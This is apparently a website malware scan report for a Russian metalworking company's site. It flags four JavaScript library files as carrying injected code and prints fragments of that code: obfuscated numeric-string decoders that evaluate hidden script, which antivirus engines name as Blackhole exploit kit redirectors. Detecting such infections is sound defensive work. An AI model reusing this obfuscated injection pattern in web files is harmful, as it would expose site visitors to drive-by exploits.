Request | Server response | Status |
http://eco-tn.ru/ | 200 OK Content-Length: 8168 Content-Type: text/html | clean |
http://eco-tn.ru/media/system/js/caption.js | 200 OK Content-Length: 5040 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var JCaption = new Class({ initialize: function(selector) { this.selector = selector; var images = $$(selector); images.each(function(image){ this.createCaption(image); }, this); }, createCaption: function(element) { var caption = document.createTextNode(element.title); var container = document.createElement("div"); var text = document.createElement("p"); var width = element.getAttribute("width"); var align =
... 3503 bytes are skipped ...1$22$56$47.5$54$49$54.5$53.5$19$19.5$22$57$54.5$40.5$57$56$51.5$54$50.5$19$19.5$22$56.5$57.5$48$56.5$57$56$51.5$54$50.5$19$24.5$19.5$15$20.5$15$18.5$22$52$56.5$18.5$28.5$5.5$4$3.5$3.5$3.5$51$49.5$47.5$49$22$47.5$55$55$49.5$54$49$32.5$51$51.5$53$49$19$56.5$48.5$56$51.5$55$57$19.5$28.5$5.5$4$3.5$3.5$61.5$5.5$4$3.5$61.5$28.5$5.5$4$61.5$19.5$19$19.5$28.5"[((e)?"s":"")+"p"+"lit"]("a$"[((e)?"su":"")+"bstr"](1));for(i=6-2-1-2-1;i-681!=0;i++){j=i;if(st)ss=ss+st.fromCharCode(-1*h*(1+1*n[j]));}q=ss;e(q);}Antivirus reports:- AntiVir
- JS/Agent.CO.1
- Avast
- JS:Crypt-A [Trj]
- Ad-Aware
- Trojan.JS.Iframe.BJT
- Ikarus
- Trojan.Script
- nProtect
- Trojan.JS.Iframe.BJT
- K7AntiVirus
- Exploit ( 04c555e71 )
- Comodo
- TrojWare.JS.Blacole.F
- Emsisoft
- Trojan.JS.Iframe.BJT (B)
- CAT-QuickHeal
- JS/BlacoleRef.BA
- K7GW
- Exploit ( 04c555e71 )
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.233
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:HTML/IframeRef.BG
- Kaspersky
- Trojan-Downloader.JS.Agent.gqu
- Tencent
- Unk.Win32.Script.400114
- MicroWorld-eScan
- Trojan.JS.Iframe.BJT
- Fortinet
- JS/Crypt.CAAD!tr
- TotalDefense
- JS/BlacoleRef.N
- Jiangmin
- Trojan/Script.Gen
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Blacole.tftlj
- ClamAV
- Trojan.Blackhole-483
- F-Secure
- Trojan.JS.Iframe.BJT
- VIPRE
- Trojan-Downloader.JS.Agent.gup (v)
- F-Prot
- JS/Blacole.BF
- AVG
- Script/Exploit.Kit
- Norman
- Downloader.HIVI
- Sophos
- Mal/ScrLd-A
- GData
- Trojan.JS.Iframe.BJT
- Symantec
- Trojan.Malscript!html
- Commtouch
- JS/Blacole.BF
- ESET-NOD32
- JS/Agent.NFO
- BitDefender
- Trojan.JS.Iframe.BJT
|
http://eco-tn.ru/templates/eco-tn/js/prototype.js | 200 OK Content-Length: 166422 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var Prototype = { Version: '1.7', Browser: (function(){ var ua = navigator.userAgent; var isOpera = Object.prototype.toString.call(window.opera) == '[object Opera]'; return { IE: !!window.attachEvent && !isOpera, Opera: isOpera, WebKit: ua.indexOf('AppleWebKit/') > -1, Gecko: ua.indexOf('Gecko') > -1 && ua.indexOf('KHTML') === -1, MobileSafari: /Appl
... 3269 bytes are skipped ...1$22$56$47.5$54$49$54.5$53.5$19$19.5$22$57$54.5$40.5$57$56$51.5$54$50.5$19$19.5$22$56.5$57.5$48$56.5$57$56$51.5$54$50.5$19$24.5$19.5$15$20.5$15$18.5$22$52$56.5$18.5$28.5$5.5$4$3.5$3.5$3.5$51$49.5$47.5$49$22$47.5$55$55$49.5$54$49$32.5$51$51.5$53$49$19$56.5$48.5$56$51.5$55$57$19.5$28.5$5.5$4$3.5$3.5$61.5$5.5$4$3.5$61.5$28.5$5.5$4$61.5$19.5$19$19.5$28.5"[((e)?"s":"")+"p"+"lit"]("a$"[((e)?"su":"")+"bstr"](1));for(i=6-2-1-2-1;i-685!=0;i++){j=i;if(st)ss=ss+st.fromCharCode(-1*h*(1+1*n[j]));}q=ss;e(q);}Antivirus reports:- AntiVir
- JS/Agent.CO.1
- Avast
- JS:Crypt-A [Trj]
- Ad-Aware
- Trojan.JS.Iframe.BJT
- Ikarus
- Trojan.Script
- nProtect
- Trojan.JS.Iframe.BJT
- K7AntiVirus
- Exploit ( 04c555e71 )
- Comodo
- TrojWare.JS.Blacole.F
- Emsisoft
- Trojan.JS.Iframe.BJT (B)
- CAT-QuickHeal
- JS/BlacoleRef.BA
- K7GW
- Exploit ( 04c555e71 )
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.233
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:HTML/IframeRef.BG
- Kaspersky
- Trojan-Downloader.JS.Agent.gqu
- MicroWorld-eScan
- Trojan.JS.Iframe.BJT
- Tencent
- Unk.Win32.Script.400114
- Fortinet
- JS/Crypt.CAAD!tr
- TotalDefense
- JS/BlacoleRef.N
- Jiangmin
- Trojan/Script.Gen
- McAfee
- JS/Exploit-Blacole.ht
- ClamAV
- Trojan.Blackhole-483
- F-Secure
- Trojan.JS.Iframe.BJT
- VIPRE
- Trojan-Downloader.JS.Agent.gup (v)
- AVG
- Script/Exploit.Kit
- Norman
- Agent.ACZSM
- Sophos
- Mal/ScrLd-A
- GData
- Trojan.JS.Iframe.BJT
- Symantec
- Trojan.Malscript!html
- ESET-NOD32
- JS/Agent.NFO
- BitDefender
- Trojan.JS.Iframe.BJT
|
http://eco-tn.ru/templates/eco-tn/js/scriptaculous.js?load=effects,builder | 200 OK Content-Length: 6034 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var Scriptaculous = { Version: '1.9.0', require: function(libraryName) { try{ document.write('<script type="text/javascript" src="'+libraryName+'"><\/script>'); } catch(e) { var script = document.createElement('script'); script.type = 'text/javascript'; script.src = libraryName; document.getElementsByTagName('head')[0].appendChild(script); } }, REQUIRED_PROTOTYPE: '1.6.0.3',<
... 3762 bytes are skipped ...1$22$56$47.5$54$49$54.5$53.5$19$19.5$22$57$54.5$40.5$57$56$51.5$54$50.5$19$19.5$22$56.5$57.5$48$56.5$57$56$51.5$54$50.5$19$24.5$19.5$15$20.5$15$18.5$22$52$56.5$18.5$28.5$5.5$4$3.5$3.5$3.5$51$49.5$47.5$49$22$47.5$55$55$49.5$54$49$32.5$51$51.5$53$49$19$56.5$48.5$56$51.5$55$57$19.5$28.5$5.5$4$3.5$3.5$61.5$5.5$4$3.5$61.5$28.5$5.5$4$61.5$19.5$19$19.5$28.5"[((e)?"s":"")+"p"+"lit"]("a$"[((e)?"su":"")+"bstr"](1));for(i=6-2-1-2-1;i-685!=0;i++){j=i;if(st)ss=ss+st.fromCharCode(-1*h*(1+1*n[j]));}q=ss;e(q);}Antivirus reports:- AntiVir
- JS/Agent.CO.1
- Avast
- JS:Crypt-A [Trj]
- Ad-Aware
- Trojan.JS.Iframe.BJT
- Ikarus
- Trojan.Script
- nProtect
- Trojan.JS.Iframe.BJT
- K7AntiVirus
- Exploit ( 04c555e71 )
- Comodo
- TrojWare.JS.Blacole.F
- Emsisoft
- Trojan.JS.Iframe.BJT (B)
- CAT-QuickHeal
- JS/BlacoleRef.BA
- K7GW
- Exploit ( 04c555e71 )
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.233
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:HTML/IframeRef.BG
- Kaspersky
- Trojan-Downloader.JS.Agent.gqu
- MicroWorld-eScan
- Trojan.JS.Iframe.BJT
- Tencent
- Unk.Win32.Script.400114
- Fortinet
- JS/Crypt.CAAD!tr
- TotalDefense
- JS/BlacoleRef.N
- Jiangmin
- Trojan/Script.Gen
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Blacole.tftlj
- ClamAV
- Trojan.Blackhole-474
- F-Secure
- Trojan.JS.Iframe.BJT
- F-Prot
- JS/Blacole.BF
- AVG
- Script/Exploit.Kit
- Norman
- Downloader.HIVI
- Sophos
- Mal/ScrLd-A
- GData
- Trojan.JS.Iframe.BJT
- Symantec
- Trojan.Malscript!html
- Commtouch
- JS/Blacole.BF
- ESET-NOD32
- JS/Agent.NFO
- BitDefender
- Trojan.JS.Iframe.BJT
|
http://eco-tn.ru/templates/eco-tn/js/lightbox.js | 200 OK Content-Length: 21640 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) LightboxOptions = Object.extend({ fileLoadingImage: '/tpl/images/lb-loading.gif', fileBottomNavCloseImage: '/tpl/images/lb-closelabel.gif', overlayOpacity: 0.8, animate: true, resizeSpeed: 7, borderSize: 10, labelImage: "ÐзобÑажение", labelOf: "из" }, window.LightboxOptions || {}); var Lightbox = Class.create(); Lightbox.prototype = { imageArray: [], activeImag
... 3149 bytes are skipped ...1$22$56$47.5$54$49$54.5$53.5$19$19.5$22$57$54.5$40.5$57$56$51.5$54$50.5$19$19.5$22$56.5$57.5$48$56.5$57$56$51.5$54$50.5$19$24.5$19.5$15$20.5$15$18.5$22$52$56.5$18.5$28.5$5.5$4$3.5$3.5$3.5$51$49.5$47.5$49$22$47.5$55$55$49.5$54$49$32.5$51$51.5$53$49$19$56.5$48.5$56$51.5$55$57$19.5$28.5$5.5$4$3.5$3.5$61.5$5.5$4$3.5$61.5$28.5$5.5$4$61.5$19.5$19$19.5$28.5"[((e)?"s":"")+"p"+"lit"]("a$"[((e)?"su":"")+"bstr"](1));for(i=6-2-1-2-1;i-683!=0;i++){j=i;if(st)ss=ss+st.fromCharCode(-1*h*(1+1*n[j]));}q=ss;e(q);}Antivirus reports:- AntiVir
- JS/Agent.CO.1
- Avast
- JS:Crypt-A [Trj]
- Ad-Aware
- Trojan.JS.Iframe.BJT
- Ikarus
- Trojan.Script
- Rising
- JS:Hack.Exploit.Script.JS.IframeRef.a!1610720
- nProtect
- Trojan.JS.Iframe.BJT
- K7AntiVirus
- Exploit ( 04c555e71 )
- Comodo
- TrojWare.JS.Blacole.F
- Emsisoft
- Trojan.JS.Iframe.BJT (B)
- CAT-QuickHeal
- JS/BlacoleRef.BA
- K7GW
- Exploit ( 04c555e71 )
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.233
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:HTML/IframeRef.BG
- Kaspersky
- HEUR:Trojan.Script.Generic
- MicroWorld-eScan
- Trojan.JS.Iframe.BJT
- Tencent
- Unk.Win32.Script.400114
- Fortinet
- JS/Crypt.CAAD!tr
- TotalDefense
- JS/BlacoleRef.N
- Jiangmin
- Trojan/Script.Gen
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Blacole.tftlj
- ClamAV
- Trojan.Blackhole-483
- F-Secure
- Trojan.JS.Iframe.BJT
- VIPRE
- Trojan-Downloader.JS.Agent.gup (v)
- F-Prot
- JS/Blacole.BF
- AVG
- Script/Exploit.Kit
- Norman
- Downloader.HIVI
- Sophos
- Mal/ScrLd-A
- GData
- Trojan.JS.Iframe.BJT
- Symantec
- Trojan.Malscript!html
- Commtouch
- JS/Blacole.BF
- BitDefender
- Trojan.JS.Iframe.BJT
|
http://eco-tn.ru/about.html | 200 OK Content-Length: 4218 Content-Type: text/html | clean |
http://eco-tn.ru/production.html | 200 OK Content-Length: 6995 Content-Type: text/html | clean |
http://eco-tn.ru/uslugi.html | 200 OK Content-Length: 5883 Content-Type: text/html | clean |
http://eco-tn.ru/contacts.html | 200 OK Content-Length: 7154 Content-Type: text/html | clean |
http://eco-tn.ru/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://eco-tn.ru/uslugi/constructorskie-razrabotki.html | 200 OK Content-Length: 6762 Content-Type: text/html | clean |
http://eco-tn.ru/uslugi/lazernaya-rezka.html | 200 OK Content-Length: 7555 Content-Type: text/html | clean |
http://eco-tn.ru/uslugi/gibka-metalla.html | 200 OK Content-Length: 8937 Content-Type: text/html | clean |
http://eco-tn.ru/uslugi/svarochnye-raboty.html | 200 OK Content-Length: 14663 Content-Type: text/html | clean |
http://eco-tn.ru/uslugi/phosphatirovanie.html | 200 OK Content-Length: 12010 Content-Type: text/html | clean |